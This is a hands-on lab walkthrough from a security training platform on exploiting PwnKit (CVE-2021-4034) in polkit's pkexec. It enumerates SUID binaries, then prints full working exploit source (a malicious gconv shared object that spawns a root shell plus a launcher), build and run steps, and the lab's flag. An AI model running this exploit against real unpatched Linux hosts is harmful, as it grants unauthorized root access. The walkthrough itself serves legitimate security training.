Lab Walkthrough - Exploiting PwnKit (CVE-2021–4034)
In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!
Introduction
The Qualys team discovered a Local Privilege Escalation (from any user to root) in Polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution.
It is a memory corruption vulnerability discovered in the pkexec command (installed on all major Linux distributions), dubbed PwnKit, and assigned CVE-2021–4034. It was announced on January 25, 2022. The vulnerability dates back to the original distribution from 2009. The vulnerability received a CVSS score of 7.8 (“High severity”), reflecting serious factors involved in a possible exploit: unprivileged users can gain full root privileges, regardless of the underlying machine architecture or whether the polkit daemon is running or not.
References
In this lab writeup, we will learn how to exploit the local privilege escalation vulnerability in the pkexec utility in a realistic environment to gain root access on the machine. It’s good if you can follow along the writeup in the lab itself, you give you a hands-on experience with PwnKit.
Lab Environment
In this lab environment, the user is going to get access to an Ubuntu CLI instance. The provided Ubuntu instance has a vulnerable version of the Polkit’s pkexec utility.
Objective: Exploit the local privilege escalation vulnerability in the Polkit’s pkexec utility to gain root access and retrieve the flag!
Acknowledgements
The setup code is based on the following Github repository:
Tools
The best tools for this lab are:
- make
- A web browser
Solution
Vulnerability Identification
Step 1: Open the lab link to access the Ubuntu CLI instance.
Step 2: Check the system information.
Commands:
uname -acat /etc/issue
We have a Ubuntu 20.04 instance running 5.4.0–107-generic kernel.
Step 3: Check all available SUID binaries.
Run the following command to find all SUID binaries:
Command:
find / -perm -4000 2>/dev/null
/usr/bin/pkexec is a SUID binary.
Information:
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged ones. Polkit allows a level of control of centralized system policy.
Reference: https://en.wikipedia.org/wiki/Polkit
pkexec utility is a part of Polkit. It is used to execute commands as another user, similar to sudo:
Reference: https://linux.die.net/man/1/pkexec
Check the permissions of pkexec binary:
Command:
ls -al /usr/bin/pkexec
pkexec is a SUID root binary.
Step 4: Check the pkexec utility version.
Commands:
/usr/bin/pkexec
/usr/bin/pkexec --version
pkexec version 0.105 is installed on the system.
Step 5: Identify the vulnerabilities in the installed version of the pkexec utility.
Look for the following search string:
Search string:
pkexec version 0.105
The search results refer to a local privilege escalation (LPE) vulnerability in the detected version of polkit.
The CVE corresponding to the listed issue is CVE-2021–4034.
Exploitation
Step 6: Open the packetstormsecurity link.
URL: https://packetstormsecurity.com/files/165739/PolicyKit-1-0.105-31-Privilege-Escalation.html
Notice the exploit code is present on this page.
Step 7: Save the exploit code to individual files.
Save the code corresponding to Makefile, evil-so.c, and exploit.c in the respective files:
Makefile:
all:
gcc -shared -o evil.so -fPIC evil-so.c
gcc exploit.c -o exploitclean:
rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so
evil-so.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>void gconv() {}void gconv_init() {
setuid(0);
setgid(0);
setgroups(0); execve("/bin/sh", NULL, NULL);
}
exploit.c:
#include <stdio.h>
#include <stdlib.h>#define BIN "/usr/bin/pkexec"
#define DIR "evildir"
#define EVILSO "evil"int main()
{
char *envp[] = {
DIR,
"PATH=GCONV_PATH=.",
"SHELL=ryaagard",
"CHARSET=ryaagard",
NULL
};
char *argv[] = { NULL }; system("mkdir GCONV_PATH=.");
system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR);
system("mkdir " DIR);
system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules");
system("cp " EVILSO ".so " DIR); execve(BIN, argv, envp); return 0;
}
Once these files are saved, you should have three files in your home directory:
Command:
ls -l
Step 8: Compile the exploit code.
Commands:
make allls
Two files, namely evil.so and exploit, are generated.
Step 9: Run the generated exploit binary.
Check the id before and after running the exploit binary:
Commands:
id./exploitid
We have obtained a root shell after running the exploit binary.
Step 10: Retrieve the flag.
Find the flag file:
Command:
find / -iname *flag*
The flag file is located in the file /root/FLAG.
Read the flag:
Command:
cat /root/FLAG
FLAG: 8c878e95370447b7abc54b2a108d9952
Potential Impact of PwnKit Vulnerability
Successful exploitation of this vulnerability allows any unprivileged user to gain root privileges on the vulnerable host. Qualys security researchers had been able to independently verify the vulnerability, develop an exploit, and obtain full root privileges on default installations of Ubuntu, Debian, Fedora, and CentOS. Other Linux distributions are likely vulnerable and probably exploitable. This vulnerability has been hiding in plain sight for 12+ years and has affected all versions of pkexec since its first version in May 2009 (commit c8c3d83, “Add a pkexec(1) command”).
How to patch the PwnKit vulnerability
Given the breadth of the attack surface for this vulnerability across both Linux and non-Linux OS, Qualys recommends that users apply patches for this vulnerability immediately.
Conclusion
With that, we conclude this lab writeup on PwnKit. The important part is the ease of exploitation of this memory corruption vulnerability. Despite being a memory corruption issue, the utility is instantly and reliably exploitable in an architecture-independent manner.
If you wish to dig down and find out more about the vulnerability and how the exploitation is done, it is worth checking the advisory published by the Qualys team: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
References
Want to try this lab hands-on? Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!